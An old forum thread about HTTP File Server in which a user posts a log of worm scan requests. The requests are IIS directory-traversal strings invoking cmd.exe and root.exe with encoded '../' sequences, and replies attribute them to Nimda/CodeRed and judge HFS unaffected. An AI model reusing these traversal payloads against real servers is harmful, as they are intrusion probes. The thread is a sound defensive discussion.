rejetto forum
Software => HFS ~ HTTP File Server => Topic started by: TGeRi on June 21, 2004, 04:21:35 PM
-
Hi!
I see this in my log:
18:14:59 81.50.202.51:3135 Requested GET/scripts/root.exe?/c dir
18:14:59 81.50.202.51:3135 Served not - 404
18:15:01 81.50.202.51:3154 Requested GET/MSADC/root.exe?/c dir
18:15:01 81.50.202.51:3154 Served not - 404
18:15:03 81.50.202.51:3181 Requested GET/c/winnt/system32/cmd.exe?/c dir
18:15:03 81.50.202.51:3181 Served not - 404
18:15:05 81.50.202.51:3210 Requested GET/d/winnt/system32/cmd.exe?/c dir
18:15:05 81.50.202.51:3210 Served not - 404
18:15:07 81.50.202.51:3232 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:07 81.50.202.51:3232 Served not - 404
18:15:09 81.50.202.51:3265 Requested GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
18:15:09 81.50.202.51:3265 Served not - 404
18:15:11 81.50.202.51:3290 Requested GET/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
18:15:11 81.50.202.51:3290 Served not - 404
18:15:13 81.50.202.51:3319 Requested GET/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
18:15:13 81.50.202.51:3319 Served not - 404
18:15:15 81.50.202.51:3351 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
18:15:15 81.50.202.51:3351 Served not - 404
18:15:17 81.50.202.51:3375 Requested GET/scripts/..À/../winnt/system32/cmd.exe?/c dir
18:15:17 81.50.202.51:3375 Served not - 404
18:15:19 81.50.202.51:3408 Requested GET/scripts/..À¯../winnt/system32/cmd.exe?/c dir
18:15:19 81.50.202.51:3408 Served not - 404
18:15:21 81.50.202.51:3433 Requested GET/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
18:15:21 81.50.202.51:3433 Served not - 404
18:15:23 81.50.202.51:3466 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:23 81.50.202.51:3466 Served not - 404
18:15:25 81.50.202.51:3491 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:25 81.50.202.51:3491 Served not - 404
18:15:27 81.50.202.51:3517 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
18:15:27 81.50.202.51:3517 Served not - 404
18:15:29 81.50.202.51:3545 Requested GET/scripts/..%2f../winnt/system32/cmd.exe?/c dir
18:15:29 81.50.202.51:3545 Served not - 404
I think he was unabel to do anything. AM i right? Is hfs safe and secure?
TGeRi
-
Looks like a Nimda scan to me.
You should not have to worry since HFS does not use any scripts that IIS uses.
To avoid yourself being scanned, you should use HFS on a non-standard port. (e.g. port #13578)
-
Looks like a Nimda scan to me.
You should not have to worry since HFS does not use any scripts that IIS uses.
To avoid yourself being scanned, you should use HFS on a non-standard port. (e.g. port #13578)
and have a good firewall!!!
Brian
AwPhuch
-
A firewall won't help if you are opening a server to a port that is venerable for attacks. But in this case, HFS is not affected by CodeRed attacks.